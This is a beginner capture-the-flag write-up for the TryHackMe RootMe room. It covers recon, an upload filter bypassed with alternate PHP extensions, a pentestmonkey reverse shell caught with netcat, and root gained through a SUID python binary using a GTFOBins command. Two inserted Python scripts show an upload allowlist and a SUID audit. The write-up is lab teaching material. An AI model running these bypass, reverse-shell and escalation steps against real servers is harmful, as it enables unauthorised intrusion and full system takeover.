TryHackMe: RootMe Write-up

In this write-up I show how to complete the RootMe room on THM.
It’s a beginner CTF challenge that was a lot of fun! Let’s connect to the THM OpenVPN network and start hacking!!

Task 1 – Deploy the machine
Deploy the machine, and you will get your machine IP address.

Task 2 – Reconnaissance
Let’s get some information about the target.
I’ll start by pinging the target to check connectivity and to get a hint about which kind of machine it is.

ping -c 1 <machine_ip>

If the TTL is less than 64 and greater than 1, it is a Linux host.
If the TTL is greater than 64 and less than 128, it is a Windows host.
If the TTL is between 128 and 255, it is a network appliance.

Nmap Scan:

We will now use the T1595: Active Scanning (MITRE ATT&CK) technique to gather information that may be useful to us.

nmap -vvv -Pn -sCV -p0-65535 --reason -oN rootme.nmap <machine_ip>

There are 2 ports open.

22/ssh – OpenSSH 7.6p1, 80/http – Apache 2.4.29

#2.1 Scan the machine, how many ports are open?
2

#2.2 What version of Apache is running?
2.4.29

#2.3 What service is running on port 22?
ssh

Gobuster:

We will now use the T1083: File and Directory Discovery (MITRE ATT&CK) technique to find directories on the web server using the GoBuster tool.

gobuster dir -u http://<machine_ip> -w <wordlist_file>

And we can see that there is an interesting folder:

/panel/

#2.4 Find directories on the web server using the GoBuster tool.
No answer needed.

#2.5 What is the hidden directory?
/panel

Task 3 – Getting a shell

We need to find an upload form, use it to get a reverse shell, and then find the flag.
Navigate to the hidden directory at http://<machine_ip>/panel/
Here we can upload our file to get a reverse shell:

http://<machine_ip>/panel/

For this task I will upload a PHP reverse shell script.
I usually use the pentestmonkey script and catch the reverse shell with netcat.

Clone the repository to download the script in the terminal:
https://github.com/pentestmonkey/php-reverse-shell

git clone https://github.com/pentestmonkey/php-reverse-shell.git

Change into the php-reverse-shell directory and make the php-reverse-shell script executable with the following command:

chmod +x php-reverse-shell.php


Open the PHP reverse shell script in an editor and set the $ip and $port variables to your host machine’s IP and the port you want to listen on.

php-reverse-shell.php

Now that the script is configured, we will proceed and upload the file.

PHP file is not allowed!

Upload failed! This is because PHP files are not allowed to be uploaded.
We’ll do a quick Google search on it.

file name bypass – google it

And we can see some other extensions that the server may still execute as PHP.

.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml…
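The upload filter here refuses only the literal .php extension, which is why the variants above get through. As an added illustration that is not from the room or this write-up, here is that kind of denylist check next to the allowlist check a defender should use instead; the function names, the allowed image extensions and the sample payload are my own assumptions.

```python
import os
import re

# Variants from the list above that a ".php"-only denylist does not stop (constructed set).
PHP_VARIANTS = [".php2", ".php3", ".php4", ".php5", ".php6", ".php7",
                ".phps", ".pht", ".phtm", ".phtml", ".pgif", ".shtml"]

def denylist_allows(filename: str) -> bool:
    """Weak check, modelled on the observed behaviour: only a literal .php suffix is refused."""
    return not filename.lower().endswith(".php")

# Hardened check (assumed policy): a fixed set of image extensions, a single extension only,
# and a restricted basename so names like "shell.php.png" are refused outright.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
SAFE_BASENAME = re.compile(r"[A-Za-z0-9_-]{1,64}")
MAGIC_BYTES = {".png": b"\x89PNG", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}

def allowlist_accepts(filename: str, data: bytes) -> bool:
    """Accept only when the basename is clean, the extension is allowed and the content matches it."""
    base, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if not SAFE_BASENAME.fullmatch(base) or ext not in ALLOWED_EXTENSIONS:
        return False
    return data.startswith(MAGIC_BYTES[ext])

def stored_name(ext: str, counter: int) -> str:
    """Server-chosen name: never reuse the client's name, so no extension can be smuggled in.
    The upload directory should also be served without a PHP handler (or kept outside the web root)."""
    return f"upload-{counter:06d}{ext.lower()}"

if __name__ == "__main__":
    sample = b"<?php echo 'not an image'; ?>"   # constructed stand-in for a PHP payload
    for variant in PHP_VARIANTS:
        name = "php-reverse-shell" + variant
        print(f"{name:28} denylist={denylist_allows(name)!s:5} allowlist={allowlist_accepts(name, sample)}")
```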

BurpSuite:

For the T1110: Brute Force (MITRE ATT&CK) technique I’ll use the BurpSuite tool.

Let’s make sure BurpSuite is running.
What I actually did was capture the request and send it to Intruder, clear all the selections and mark only the .php extension, so that when I ran my sniper attack it would change the php to whatever I chose.

Intruder – BurpSuite

On the Payloads screen I added the other extensions (see above) for it to try in the brute force.

extensions

I will start the attack and look in the results for responses whose length is greater than the length of the .php response.

results

We will rename the script file using the command:
mv <filename.php> <filename.specific_ext_from_the_list>

mv php-reverse-shell.php php-reverse-shell.php2

Now let’s try uploading the script again.

success

We have successfully uploaded the script.
Now we need to start a netcat listener. I am using port 1234, the same port and host IP of my machine that I inserted in the script we edited and uploaded.

netcat:

nc -lvnp 1234

Now we have to gain a shell by executing the uploaded script in the http://<machine_ip>/uploads/ directory that we found earlier (see above).

We can also see here all the files that were uploaded successfully during the brute force we did with the BurpSuite tool.

Just click on one of them (some of them are not working properly; .php5 and .phtml are working from my test) and check back on your netcat listener.

connect to <machine_host> from <target_host>
I told you we’ll succeed in the end!

But the shell is a little uncomfortable to use.
So we’re going to upgrade it using Python.

Python:

First we’ll check if we have Python.

which python

And we can see we have Python.
We will now upgrade our shell using the Python -c flag, which runs the given command string.

python -c 'import pty;pty.spawn("/bin/bash")'

And we can see that we have upgraded our shell to bash.
We will search for the user.txt file using the find command.

find / -iname user.txt

We’ll look for one that we have access to, like /var/www/user.txt.

/var/www/user.txt

Navigate to /var/www/user.txt.

cat /var/www/user.txt

#3.1 user.txt
THM{XXXXXXXXXXXXXXX}

Task 4 – Privilege escalation

We are going to use T1548.001: Abuse Elevation Control Mechanism: SUID and SGID (MITRE ATT&CK) technique.

find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null

We have /usr/bin/python with the SUID permission.

#4.1 user.txt
/usr/bin/python
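The find command above is the attacker’s view; the same check makes a simple defensive audit. As an added example that is not from the write-up or the room, this Python script lists root-owned SUID/SGID regular files and flags the ones named like an interpreter or shell, which is exactly what made /usr/bin/python exploitable here. The interpreter list and the function names are my own assumptions, and the list extends the page’s single python case to a few other interpreters.

```python
import os
import stat
from typing import Iterable, Iterator, List, Tuple

# Names that hand out an unrestricted shell when SUID root (assumed list; python is the case on this box).
INTERPRETERS = {"python", "perl", "ruby", "php", "bash", "sh", "dash", "zsh", "vim", "find"}

def is_setuid_or_setgid(mode: int) -> bool:
    # Same test as: find -type f \( -perm -4000 -o -perm -2000 \)
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def flag_entries(entries: Iterable[Tuple[str, int, int]]) -> List[str]:
    """entries yields (path, st_mode, st_uid); returns root-owned SUID/SGID files named like an interpreter."""
    findings = []
    for path, mode, uid in entries:
        if uid != 0 or not is_setuid_or_setgid(mode):   # uid 0 mirrors: -user root
            continue
        stem = os.path.basename(path).rstrip("0123456789.")  # python3, perl5.30 -> python, perl
        if stem in INTERPRETERS:
            findings.append(path)
    return findings

def walk_filesystem(root: str = "/") -> Iterator[Tuple[str, int, int]]:
    """Yield (path, mode, uid) for every file under root, skipping pseudo filesystems."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        if dirpath.rstrip("/") in {"/proc", "/sys", "/dev", "/run"}:
            dirnames[:] = []          # prune: nothing useful and lots of noise below these
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink is not a regular file, like find without -L
            except OSError:
                continue              # unreadable entry, same as the 2>/dev/null above
            yield path, st.st_mode, st.st_uid

if __name__ == "__main__":
    for hit in flag_entries(walk_filesystem()):
        print("root-owned SUID/SGID interpreter:", hit)
```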

We will try to escalate our privileges.
To do this we will Google for GTFOBins and look up python there.

Read the description before doing anything.
We can skip the first command, as the binary already has the SUID permission.
Just run the second command:
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

We have successfully escalated our privileges and we can confirm we are root.

#4.2 Find a form to escalate your privileges
No answer needed.

Let’s get our root flag.
Navigate to /root/ directory to find your root.txt.

root.txt

#4.3 root.txt
THM{XXXXXXXXXXXXXXXXXXXX}

Congratulations on completing the room successfully!

I would be happy if you like and comment.
I really enjoyed doing this content for you.
Be careful, the internet world is big.

-Chai Geydarov
